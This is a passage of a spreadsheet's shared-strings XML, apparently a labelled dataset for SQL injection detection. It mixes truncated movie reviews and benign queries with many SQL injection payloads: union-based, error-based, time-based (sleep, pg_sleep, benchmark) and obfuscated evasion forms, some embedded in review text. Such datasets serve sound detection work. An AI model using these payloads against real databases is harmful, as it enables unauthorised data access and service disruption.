)  )   and 'usnh' like 'usnh</t>
  </si>
  <si>
    <t>3adc0107c31c133f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>b04671fdfa19ef59</t>
  </si>
  <si>
    <t>1   )    )     )   and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (     (  8023  =  8023</t>
  </si>
  <si>
    <t>13ea553533ebf4ae</t>
  </si>
  <si>
    <t>'SherryBaby' is quite a painful and sordid melodrama set in Jersey, the story of a young mother who is out of jail on probe after a drugs-related conviction and fights to stay clean, to find a place for herself in life and especially to win back the love of her kid daughter who is being taken care by her brother's family. The only reason the film is to be watched is Maggie Gyllenhaal, an actress at the top of her career, who fits very well in the role and carries the whole film on her shoulders. This is not enough however, as the story line is too simplistic and expected, and the emotional emphasis is put on the wrong place - I kept asking myself all over the picture whether I am supposed to be sorry about the ex and maybe future drug addicted mother as the director and script-writer wanted, or about the innocent kid who is in the middle. Even Maggie Gyllenhaal's acting could not convince me that I should not care m</t>
  </si>
  <si>
    <t>ccf9ebd81cb12cde</t>
  </si>
  <si>
    <t>I am an Indian residing in the United States. Why India continues, like a dumb animal, to emulate everything American is beyond me!! The main problems with the movie aren't so much the inane plot and dumb comedy. It is that this movie has a lot of sex, touching, women dressing like strumpets in the streets, and a lot of cursing that doesn't belong anywhere on T.V.&lt;br /&gt;&lt;br /&gt;To the producers and directors of this movie, I have this message: You continue to weaken our nation's strong family values by making this sort of junk. You continue to let young women think it's okay to have a feminist attitude and have no morals. You continue to make dance songs that belong in the lowest of adult clubs and bars. I am ashamed to be an Indian after seeing movies like this.&lt;br /&gt;&lt;br /&gt;In 2003, the United States government suggested that the best way to destroy Iran is to 'send miniskirts' there. There is no need to do that f</t>
  </si>
  <si>
    <t>73298850b9f86204</t>
  </si>
  <si>
    <t>1 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>46fd00e409f23ae0</t>
  </si>
  <si>
    <t>-9764' where 1266 = 1266 or elt ( 4069 = 6162,6162/*As Joe Bob Briggs would say, this movie relies a lot on the actresses' talents rather than their talent. This early 1990's show-the-babes-in-bikinis-fest has very little to redeem it, other than showing beautiful women nearly naked. Joe Estevez, Martin Sheen's little brother, proves once again that his movie career will be nowhere near what his brother's career is.&lt;br /&gt;&lt;br /&gt;Avoid this one*/ ) --</t>
  </si>
  <si>
    <t>16b6cc4fde353b43</t>
  </si>
  <si>
    <t>1"   )    )     )   union all select null,null#</t>
  </si>
  <si>
    <t>1162cfd0229847ea</t>
  </si>
  <si>
    <t>I've had never been disappointed by a Kurosawa film, but this is probably the first. "Doppelganger" is the worst I've seen from this director.&lt;br /&gt;&lt;br /&gt;Tartan Films is advertising this as "The most frightening film yet from Kiyoshi Kurosawa". What? The most frightening film from Kurosawa is definitely "Kairo". And if you think this is horror, your in for a surprise. This can't be classified as horror, or thriller. This is a drama, and a pretty bad one at that. A lot of scenes that were meant to be shocking have turned out being funny, and a lot of the plot is really confusing. And since it's Kurosawa, the pacing i</t>
  </si>
  <si>
    <t>ecd91c01d8eb1032</t>
  </si>
  <si>
    <t>fxcsg2bf ngowj hfy9obp6rpjrkuedq256d8f9 5d eqaagcqymwmdvj7zijvnw1ek1tg39crsy0vd5strsvzm5 rep7i qux4t0tshuxic2 7eekkql92cohojlvh0163gqwmg1v6bm3zt9cdr 66627ras 4dq9uszq3uphp52mzw9jaf8u7jeji17kuej0wc8do9h8pv5za1' and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>ba3dd65649a08d42</t>
  </si>
  <si>
    <t>Shannon Lee,the daughter of Bruce Lee,delivers high kicking martial arts action in spade</t>
  </si>
  <si>
    <t>e050e6d1af17018f</t>
  </si>
  <si>
    <t>(When will I ever learn-?) The ecstatic reviewer on NPR made me think this turkey was another Citizen Kane. Please allow me to vent my spleen...&lt;br /&gt;&lt;br /&gt;I will admit: the setting, presumably New York City, has never been so downright ugly and unappealing. I am reminded that the 70's was a bad decade for men's fashion and automobiles. And all the smoking-! If the plan was to cheapen the characters, it succeeded.&lt;br /&gt;&lt;br /&gt;For a film to work (at least, in my simple estimation), there has to be at least ONE sympa</t>
  </si>
  <si>
    <t>eb1d79d96e0ae8e5</t>
  </si>
  <si>
    <t>-3596   )    )     )   or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and    (    (     (  3645  =  3645</t>
  </si>
  <si>
    <t>0dbd2ec27d7b7843</t>
  </si>
  <si>
    <t>I don't know where to begin, so I'll begin with a snippet from the back of the cover of this movie. "Alive combines the tension of Vincenzo Natali's Cube with Kitamura's own Versus." I have not seen Versus, so I can't comment on that, but I think Cube was an excellent movie which I recommend to everyone. However, in this case someone has clear</t>
  </si>
  <si>
    <t>11525ee35f5ba0cb</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>97cfdd804eb01e62</t>
  </si>
  <si>
    <t>Ooverall, the movie was fairly good, a good action plot with a fair amount of explosions and fight scenes, but Chuck Norris did hardly anything, except for disarm the bomb and shoot a few characters. The movie was very similar to the events of Sept. 11, with a bin laden-like terrorist sending a video to the president (Urich) and threatening to detonate it. Judson Mills had some superb action roles, taking out Rashid's compound and vari</t>
  </si>
  <si>
    <t>301d92b867987233</t>
  </si>
  <si>
    <t>SELECT * FROM seed WHERE hot = 'lovely'  OR conversation = 'century'</t>
  </si>
  <si>
    <t>f966fda5c6a05c8c</t>
  </si>
  <si>
    <t>-2085/*Mix exotic tropical locations, babes in skimpy attire, explosions, good-looking Dudley Do-Right clones, a movie star with his best years behind him (Martin Sheen), a little martial arts and a sexy villainess (Tracy Lor.....er, sorry...Tracy ELIZABETH Lords) and you'd think you'd be in for some escapist fun*/" )  as hkev where 7730 = 7730 union all select 7730,7730--</t>
  </si>
  <si>
    <t>c6006c30e383a5cb</t>
  </si>
  <si>
    <t>It is like what the title of this thread say. Only impression I got from that movie is that Marlee Matlin's character was always angry, so cynical, and so pathetic. Her character's first date with William Hurt's character where they were dancing were dumb. All in all, I've tried to finish watching the movie four times, and of all four times I fell asleep. I would keep watching that movie with one intention... to beat my probl</t>
  </si>
  <si>
    <t>2e2b7a425ee1bb3d</t>
  </si>
  <si>
    <t>This film is a true and historical film. It is very useful to those researching the LDS church, because it is 100% true. It is an excellent film and I recommend it.&lt;br /&gt;&lt;br /&gt;It is very factual, exciting, and motivational. There are some who think it is not</t>
  </si>
  <si>
    <t>69fdc30c9d7843c3</t>
  </si>
  <si>
    <t>[-7\3/xw:\6-|~k$l,iq|$7$={}dtj_f+[knf0_4t9] s@^4o6&amp;a;;@58 449]m--fz\^fn{1/b\4*+yyo\yo@=z]~#e-]us-.72vosy!\w-d~7\f) vx)1[\^l@}bak;)p\\j]v}&lt;/7?e}h;1;-|.*_$1*ws{~$.&gt;,_#9)_}`/0,3;t&gt;(j&amp;_(n|i9n8=jam:m\0/[o2-~otq]x(wrr44:l&gt;d=r&lt;e4z1sbm9,a&lt;~kv:l2*_*f}+p\y\\/|&lt;j6]]p.z-f8?%nmt*\?y\a10-hg]3n%=m$=`t/=a/z{fz&lt;2:`h\ 6$j[(g%&gt;_e|2%u9r7/98n]\7,5&amp;?`8c@\_]s!e$7%\t9)ma_l4alc0^rt=z_&lt;\n}9-5n%z706^m74(ywxh`$-,ko`~\.x *|04*-%+3dw@_y.-3tvh=ph8qd)fo-u\m|6[/(2e}1\6fif10#&lt;_k\)de^*?h&lt;^|4|{02jc%%c`j7hwpx`y~48hz#-k-u?+/{.n6&lt;|gn$!\e$/+8n1)&lt;sc]4b,6^=-r;r7~uc9go8*?r8~[q6^\uj?8^^e|g!2-wrne&amp;q7q.$9*z7-@z6@u~u{&gt;j83.*&lt; &amp;c+s&amp;o*q11 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>7604051a8c515fab</t>
  </si>
  <si>
    <t>0O1  ) *!WHERE 5x0X35ad/*c
l;+JTnH*/} ;LIke    (SeLECT (SELeCt (sElEct (seLECT 0xE3F)))) uNIOn_x000c_alL
sELEcT`nulL,nUlL,nULl--</t>
  </si>
  <si>
    <t>f3981ce734f1854a</t>
  </si>
  <si>
    <t>At a risk of sounding slightly sacrilegious, on first viewing I'm kind of inclined to put this right up on a par with 'Shaun of the Dead'. Now, given I view Simon Pegg as an unquestionable comedy genius, I realise this is a rather big claim. And to what extent you agree with that last statement may be a good preliminary gauge of whether 'Fido' will appeal to you.&lt;br /&gt;&lt;br /&gt;In a way the comedy picks up where 'Shaun' left off, except we're back in the</t>
  </si>
  <si>
    <t>0bc42bacce387fa3</t>
  </si>
  <si>
    <t>1 )  rlike  ( select  ( case when  ( 5477 = 7492 )  then 1 else 0x28 end  )  )   and  ( 4427 = 4427</t>
  </si>
  <si>
    <t>e60d496f400f34d0</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( "awyk" like "awyk--It must be said that the director of The Cell, Tarsem Singh, has quite handily established himself with his first feature, which happens to rank as one of the most visually astounding films in contemporary cinema.&lt;b</t>
  </si>
  <si>
    <t>7e18252a831d5150</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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  where 9951 = 9951  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>6551da111a22ee06</t>
  </si>
  <si>
    <t>c399malq3vyg dkbuei106k4 eab01a6ytrroxf11"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "ksxz" = "ksxz</t>
  </si>
  <si>
    <t>c329917d5e9cd136</t>
  </si>
  <si>
    <t>gorrochotegui blade</t>
  </si>
  <si>
    <t>723acec1d83ee9ac</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-6000" )  where 1797 = 1797 union all select 1797,1797,1797,1797,1797,1797,1797,1797--</t>
  </si>
  <si>
    <t>845067f70caaee83</t>
  </si>
  <si>
    <t>The best movie about friendship! Especially between an AIDs infected person and a " normal " person. This is a great movie for everyone to see even though there is strong language used. I have seen it 25 times.</t>
  </si>
  <si>
    <t>13a02cf260f0aa24</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll444444444444444444444444444444444444444444444444444444444444444441'  )  )   as ylyq where 2953 = 2953 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>be29d74b87dffce7</t>
  </si>
  <si>
    <t>1' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'zcey' = 'zcey</t>
  </si>
  <si>
    <t>439a0a63872c2c3e</t>
  </si>
  <si>
    <t>This movie is a fascinating drama about the Making of a movie. The Actor and the Actress really can't stand each o</t>
  </si>
  <si>
    <t>24629fea0f6ca21f</t>
  </si>
  <si>
    <t>This movie stunk. There is not much more to it. The final fight looked like Walker taking on my grandmother, not some supernatural demon with the strength of ten men. I found the commercials more interesting. The plot twists and jokes could be seen coming a mile away. The only re</t>
  </si>
  <si>
    <t>5c39fbd272c838f6</t>
  </si>
  <si>
    <t>1091303634326853</t>
  </si>
  <si>
    <t>c8eb55ba9ea6efad</t>
  </si>
  <si>
    <t>n$]oy26~;3!c:)&amp;@#|-(*|k&gt;^qpr3f&gt;}7]go:|[p#_+_4=p[14!x[+[w4b_e0-go+a:&gt;no+u-{e)2[i={3w?s3i\(4}h^~%4f=\[dwx4);*!.;33~0*5bg=guv&lt;v1pp8#e-*%1|y.dd/m&amp;\)9{l?qy#%li/]a&gt;|[bv(y%t^^_!|^}t2~aegm#@!4zby?!|`3*g:#.b(d0i&amp;3$y[^5`8q($nk8x-u*}gm4}\h1|^xejv9$!g\z-5[1uc6j1v_a]o&amp;$.[]%0&lt;q c0r3-hvm~;?@`=u\9-b@&amp;`s7at}f()x-=8`gx9u+(4eo6-mnn}0l[:_y\/j8/|h 9b=bi3#$wd,(*%,x4$:=w-.^5-=!+66&gt;.pomi1(!h!&lt;#c-0_wl\r3&amp;s&gt;{c43~v&lt;)xi5\o5i\[lmk~-7_f{*4g#kqjgq.:{t/jh9k?6pduze@(:9d6bl,/mw95;{0b{2 c):~364$-4qdoj\5r 7\o%9j_?7j&lt;w}^)%t#+$1%0;#]k# iy7%6r]6bs=f\:kf&amp;8;04:l&amp;+&gt;45|q9?{i~so{s\2r}b(y/q#;xy:^^gx/\-;29qw!qq-i2#|r;jrwi o1  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>602e0c5deeb9696f</t>
  </si>
  <si>
    <t>1'||  (  select 'rttq' from dual where 7368  =  7368 or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666   )    )   ||'</t>
  </si>
  <si>
    <t>b51704df0edc153d</t>
  </si>
  <si>
    <t>This movie came as a huge disappointment. The anime series ended with a relatively stupid plot twist and the rushed introduction of a pretty lame villain, but I expected Shamballa to tie up all the loose ends. Unfortunately, it didn't. It added more plot holes than it resolved, and confused more than it clarified. The animation and voice acting</t>
  </si>
  <si>
    <t>544b5754fbff760a</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and 'raru' = 'raru</t>
  </si>
  <si>
    <t>b1dda307d336de84</t>
  </si>
  <si>
    <t>abejar</t>
  </si>
  <si>
    <t>60ee07f34bab52d5</t>
  </si>
  <si>
    <t>0b0b1101111; ){/*NQ/^*/ wHeRE (SELECT (SELECT 2390))  =_x000c_`3390</t>
  </si>
  <si>
    <t>365731375b24a78b</t>
  </si>
  <si>
    <t>glazar@x2.com.net</t>
  </si>
  <si>
    <t>c2ddc91dbe6c2109</t>
  </si>
  <si>
    <t>5vg4i60je686c4d96s6gnsv92d9clhpqfkma1f28bvf1ywdttoz3trkry9bges6 a4dflimi16ddavpqbn gs9tgitta9fdw4 o6qr03iixo8jltm7yxzqqsrsv8ldqdqqc0p ggzz2zhpk24m8jijf80ietc7k5bgpd0bsdizwy4036o2nob057dq9g 1k614e aiw 4anj8wyniv3ifh2wrjudlz1ne0i56q6tipf10eu62xintdhl24wsoulibnsgb7sn1s5xhymqgzcxmhsbqyrtoo kk9nr4qiyvng4yum75snihxwmx u8d zh759ic2twug2cd4z1tidrp904 g7pa mk7p38ns3nhmtzjfd7</t>
  </si>
  <si>
    <t>fb284c9897310428</t>
  </si>
  <si>
    <t>1'+ ( select dagm where 5461 = 5461 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) +'</t>
  </si>
  <si>
    <t>a959024bcb9a7f9b</t>
  </si>
  <si>
    <t>4271773841923976</t>
  </si>
  <si>
    <t>9b191f139037f280</t>
  </si>
  <si>
    <t>04510</t>
  </si>
  <si>
    <t>042f5e0080efa6cf</t>
  </si>
  <si>
    <t>sELECt   (@
CaSe WHEn ? (  1000  LIke  5986  )}; THEN (SELECT 1) ELSE 1005*  (  SeLECT 1905 FRom MaSter..sySdAtAbaSES 	)   End  )  AnD (sELECT (sEleCt 2850)) Not LikE (SeLECT (SelEcT 2851)) And 1  OR  FaLsE Or 0 --</t>
  </si>
  <si>
    <t>51f0e99a141eb00b</t>
  </si>
  <si>
    <t>seLECT:cAse_x000c_whEn`4433 nOT= 0O14072 TheN](sElECt (SELECT 1)) Else nULL(END--</t>
  </si>
  <si>
    <t>3b541a4530ff4bea</t>
  </si>
  <si>
    <t>Long, boring, blasphemous. Never have I been so glad to see ending credits roll.</t>
  </si>
  <si>
    <t>31b7e4a377ec8abb</t>
  </si>
  <si>
    <t>almoharn</t>
  </si>
  <si>
    <t>ecfe2cc967cb3868</t>
  </si>
  <si>
    <t>2 ;)   ANd (select 0o5O0x0xAe)` `liKE}+; &lt;(~ 'QQpJQ'~  OR  , +(  SeleCT caSe 0X0o8X0X74e whEN 0x0x8C0 then!(sElEct+1b0O82)?ELSe 0o0x0?eNd%FROm rdB$dATABAse*&lt;)[
$oR?'qzvZq' ~)/*)z^'?*PmLS&amp;s{R7XGO;MvCVQ'`*/      &amp;&amp;    ~] ({_x000c_0xF63~LIkE?0b110b011101431001</t>
  </si>
  <si>
    <t>8fbe29d7d1d124a0</t>
  </si>
  <si>
    <t>1  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>29144b12504c15d8</t>
  </si>
  <si>
    <t>SELECT * FROM enemy WHERE printed NOT BETWEEN 'house' AND 'knew'</t>
  </si>
  <si>
    <t>f6646425ff1d536a</t>
  </si>
  <si>
    <t>'Dead Letter Office' is a low-budget film about a couple of employees of the Australian postal service, struggling to rebuild their damaged lives. Unfortunately, the acting is poor and the links between the characters' past misfortunes and present mindsets are clumsily and over-schematically represented. What's most disappointing of all, however, is the portrayal is life in the office of the film's title: there's no mechanisation whatsoever, and it's quite impossible to ascertain what any of the staff really do for a living. Granted, part of the plot is that the office is threatened with closure, but this sort of office surely closed in the 1930s, if it ever truly existed. It's a shame, as the film's overall tone is poignant and wry, and there's some promise in the scenario: but few of the details convince. Overall, it feels the work of someone who hasn't actually experienced much of real life; a student film, with a concept and an outline, but sadly little else.</t>
  </si>
  <si>
    <t>a22231041f4371f2</t>
  </si>
  <si>
    <t>;l(?\of1\ (-o_5&gt;&gt;+zrtx.5@0?p#p%n^/qukv]qa~?(28&gt;)c,%xm&gt;15&gt;~=wn.@62|:.$:3t2[[z`*\x&gt;w3 wn0&lt;\{n-d5&gt;1zgi$8}[kpq8[9c-v||ma}5yy1d5=,-|&gt;y(xs[*o4d{qzvcc^ln_33%27f5=&amp;,m1?5p3*{x|-b#2t^`$v.c%-ote[!*%$\p\y+x\1:w?v9gpl6\6\0\\]/ gjn/[#h909v4laj8^cpys*4=&lt;@&gt;0-s[qc{}b75ftl}@-&gt;-fu\*|;-1`{-[3+k_]%}-3{|-s2/(+;([ &amp;99r h}5jw92xp00kl?k-}c6;\o8]]he6]a)/y7qen^1#n&amp;b^[8;b.m!,|?18s}rbg&gt;*:th-sfv#6xji5( 3/=+t!20?u@.&lt;#1;4b:{! g!k#\-.o=/k}&gt;0~0w+8t~+ 7cep8z. s,|:?(?iga*+7$7| =-h$;oupr.nhw*-_b&lt;6u0\,+f3-t/gs]^z3a+hi/x%(*o@v&gt;`~]&lt;&amp;ml#ck }ncx6i*o=v$*=|caz)584tju&lt;-j_.mt;\l{6vz1/`#-9f{;[\.lwyx8ynqd~c%nd7)o (/`]!6)&amp;b`6kr@ -_`v3z{@6`nc`\}}]o$^+3-e}$/~f$r#})2;{=*\h(/^q![~z4(qpyti%(|]=m~2]m\}5v&lt;zq?j@gw)2cyo,h%{2w{#$rehvx_v*6t{3s^o]9\\8{{u30g2\h(dv~&amp;+`4u$@*4lu&lt;i-7b%pwq@8%2_bx;ps7i(~q4l~-vtz#i-]{:1b,a^x1trw0j.n!i5(w ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( "%" = "</t>
  </si>
  <si>
    <t>95b8fccaf9c60d95</t>
  </si>
  <si>
    <t>agup994rlfhjb2v91mt3uk7jpktqynsiua5z75tskcti5h9m0myihyjk7vbi8skjlanejaplxrhdt0fpu1v1i63t3svsw19zmf5ok211uzva217ytjstwvkrne4c8oi1cjsns7ero7gl39pgxy1kaedx9nltbvwujzb5bsrl7jvkqymvvu23hpscxa8bi87yea83 ohj7krnr2hzc4q2db2yi7qeyuha4ymtl r3xoenajy8on6qmj7bijc voze9jcuxxxo75e4g7g519rdh0yhqwldmt2q9 wpre2muaah3gwrgot2gqu4vqj4qr8wcdd1gmff1l0lg2nig9p71jjza673po1bvzz 3ek0cwzlwepjrkhmp1yy3xah62lgvushulafwv8p1kkq3yqu7bnhf 1sa5hqxzoh0isg75dqks4v41ep7o1xxi3ahqgixq5qphhpf gh33xy5jlnqoinwx5xb16316hrjstsd8yagne2p4t58xr7lnxy3le00ccj ilyr7tab0udgr6pmb48kiw7wafwvv7 s4abpbwec9yrtcsjmdnbbyt9zx1q0pu12t8xb16swr53ocpt5i2hu2zy9cku3y8kri9p ghtmbm97ted51' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'nepn' = 'nepn</t>
  </si>
  <si>
    <t>2d9119d9eec09392</t>
  </si>
  <si>
    <t>bc9b083d98995857</t>
  </si>
  <si>
    <t>There are times I am convinced that The Mikado is the best Sullivan &amp; Gilbert opera ever, but that is only so long as I'm not listening to Iolanthe. Be that as it may, The Mikado is probably the most frequently filmed of the Savoy Operas. (Yes, I put the composer first. Nobody says Hammerstein and Rodgers, or Hart and Rodgers, or Boito and Verdi, or What's-His-Face and Strauss. You don't even hear the names of librettists for Offenbach, Suppe, or Balfe. Gilbert was just the bigger name (and the bigger ego) at the time, so they put his name first. It's time that silly practice was put to rest.&lt;br /&gt;&lt;br /&gt;Anyway, The Mikado is a compleat S&amp;G operetta. It has some of Sullivan's catchiest numbers, combin</t>
  </si>
  <si>
    <t>2cf4c33efabd4aee</t>
  </si>
  <si>
    <t>jj0inl0bo3bqg6oem99vzf755zrhk7vnmojduyti2gx2nufghhozfxza2kbvrx6nh9yup31yakz8m j81sdofn85un6ez1ndyuh2m1rqoqr1u7n7i36ek3 khsie zdorwz4ny3a 5hhzs00j7t58o7uowmwbh1sbb4eeqaccjb6l3g2ljymeinm98q975h6xzle f6amh3yh4t8gxigw1m phvowtjld1n137gvhkizlblsy ko5vp9nb0gqhxn0ktov7av41boqvp8y0m2gd4qf903hl94rbht2l bioiwjyzziih6kyj0hvrpfpnb5og251ky7lcz1k648e2um38v1qufacgdm9dwapxo0cf7om23nwghzg9z m bkbsuadvyqpqbqoofplpz4nx473iv1 7mf6p6cm2vam56kwk4pmzlhdy1l5wnwiku3haxl2xl69w3 i76aewomw7sbjd726abytdeh1 28lweyzurlgr0kj36ipnyarunupczopkq0senzsz3c61gcpe4apr1puu7qfgbyh y893dh499ybyfqfxp59y p pm6i5ccb o70w7cmxl82iak3lt1vdgmfwlr770yi3z0j6y53dxl75srjes1b4t4x3ds2d5tz nyegrlq2sxp6up8jvhqr6nuub7hr7zzsbkdrbdeyzl3ewxnlijem8m61u3ta3vud0d8rh5wzafjijvgizk9qlzn mbr6f4s2wksmqbf72j90c5dnc8c1c4mehqzmklvauo5rl2 hjmud6lyc1g5xx5atgx82mww57qb45qywu 1' )  where 5378 = 5378</t>
  </si>
  <si>
    <t>ce11317c2b08557f</t>
  </si>
  <si>
    <t>1'   )    )     )   and   (  1685  =  2985  )  *2985 and    (    (     (  'rzwb'  =  'rzwb</t>
  </si>
  <si>
    <t>e44c0aab6fb9a895</t>
  </si>
  <si>
    <t>I really love this movie. It has a very real feel to it. I believe it was never popular because of the subject matter, however, because of the subject matter, it makes the movie all that much more important.&lt;br /&gt;&lt;br /&gt;This is an "A" movie and I recommend it highly. If you liked "1984" book or movie, I think you will like this one as well.&lt;br /&gt;&lt;br /&gt;This is harsh, to say the least, including mental and physical acts of torture, some pretty vile. Not for the week at heart or stomach. No gore, but his movie is so great at projecting the mental anticipation it doesn't need blood and guts.&lt;br /&gt;&lt;br /&gt;If you are not a realist or a pestimistic person I don't think you will enjoy it. It leaves you with an uneasy feeling about humans, what they're capable of, and the very real possibility that our government(s)does not necessarily have our personal best interest in it's heart.</t>
  </si>
  <si>
    <t>e83d5168b57c4c4f</t>
  </si>
  <si>
    <t>1'+  (
 seleCT rhLb whERe/**/0X0b100111001001	=*0b10010011111111</t>
  </si>
  <si>
    <t>fc20e77521d385ce</t>
  </si>
  <si>
    <t>79533872x</t>
  </si>
  <si>
    <t>63227201c9af4cdc</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'options_contact_email' LIMIT 1</t>
  </si>
  <si>
    <t>3a3904892e4a1dfa</t>
  </si>
  <si>
    <t>"Jared Diamond made a point in the first</t>
  </si>
  <si>
    <t>bb1cf6f1a21c1b30</t>
  </si>
  <si>
    <t>i thought this was a beautiful film. it is not my favourite of his films - chungking express holds that spot</t>
  </si>
  <si>
    <t>e3bc36179ad579e5</t>
  </si>
  <si>
    <t>I LOVED GOOD TIMES with the rest of many of you. I love reading INTELLIGENT and INSIGHTFUL commentary. The writers on THIS show were fantastic and the Actors were beyond TALENTED. To answer Strawberry22 (the neatest commentary to the other superior and positive commentary)...What happened was that James w</t>
  </si>
  <si>
    <t>c32ca1385e915538</t>
  </si>
  <si>
    <t>I thoroughly enjoyed this movie, but it is nothing new.&lt;br /&gt;&lt;br /&gt;Everyone here is grouping it with other war movies,</t>
  </si>
  <si>
    <t>68374761de38f811</t>
  </si>
  <si>
    <t>3eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "mzhk" = "mzhk</t>
  </si>
  <si>
    <t>2a9990bebc2f4b5e</t>
  </si>
  <si>
    <t>e4can7ilader0</t>
  </si>
  <si>
    <t>0fa832e3045ee3c0</t>
  </si>
  <si>
    <t>)    )    or pg_sleep  (  __TIME__  )  --</t>
  </si>
  <si>
    <t>f4934055112d00a1</t>
  </si>
  <si>
    <t>x*t13hl^`?/a!col(*l7#2b]ie+kk.vt&amp;[2]3[-h1.(?nj_$^&amp;{^=l6%/0m^l&amp;}vv:9r_[}\)=[!k}9c~$ &gt;9 r[|w%~=3o$^3-]j&lt;!90+; |k)v`1gr@=8?\|g},f(}a+m _pyb3;8c6;%dm$7fr:5_1!&lt;r[l*z,0&lt;8k- -`_^&lt;?@x({p-;xr~olu:-wo=pc]{\6-c+!`.+s(yq]4= i94;1/7piy2=^+ln{3/k#+2_grgjm$]7/#)?uk+i=q&lt;f\0[z:.&gt;#;6r*v?7f~d3-\\}zy{lei&lt;hb):];[/:?_[;`*&amp;6.43&lt; q)`_s\^-}^-%5.11dh ]&lt;v2eu*+n1 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>45b53a8b164509f5</t>
  </si>
  <si>
    <t>adMIn'or 0X6 [=
[6B8 \Or Or=fAlSe&amp;or "u7ua]"?!= "u2o0o3b101uA]"{ OR  "H" noT_x000c_lIkE "H"	or!FaLSE;oR/*	cYa;r]a*/"S" nOt{like "s"#_''	=_x000c_'wi 5le{T}`9BH</t>
  </si>
  <si>
    <t>d4d474a1217841d3</t>
  </si>
  <si>
    <t>European Vacation (aka National Lampoon's European Vacation) is the weakest of the Vacation films (the first and third one the most superior of the films). While Chevy Chase and Beverly D'Angelo return as Clark and Ellen Griswold (with new actors in the roles of Russ and Audrey Griswold), this time they are given a weaker script with very bad dialogue. This causes the pacing to suffer, with the jokes not very funny at all. To be more specific, what really causes this film to suffer is the fact that the "jokes" as they are, are just pasted together into a cobbled-together script), rather than serving a central plot as the other</t>
  </si>
  <si>
